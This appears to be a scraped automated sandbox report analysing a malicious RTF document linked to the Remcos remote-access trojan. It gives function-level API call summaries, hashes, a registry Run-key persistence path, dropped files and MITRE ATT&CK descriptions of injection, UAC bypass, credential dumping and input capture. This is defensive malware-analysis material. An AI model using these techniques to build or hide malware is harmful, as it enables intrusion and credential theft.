String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668

Uniqueness

Uniqueness Score: -1.00%

Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1

Strings

pth_unenc, xrefs: 0040B869

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Strings

pth_unenc, xrefs: 00412850

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Uniqueness

Uniqueness Score: -1.00%

Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
GetLastError.KERNEL32 ref: 00440D35
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759

Uniqueness

Uniqueness Score: -1.00%

Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Spreading

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\RMCD.vbs

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Function 035C05B9 Relevance: 6.1, APIs: 4, Instructions: 106
libraryCOMMON

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre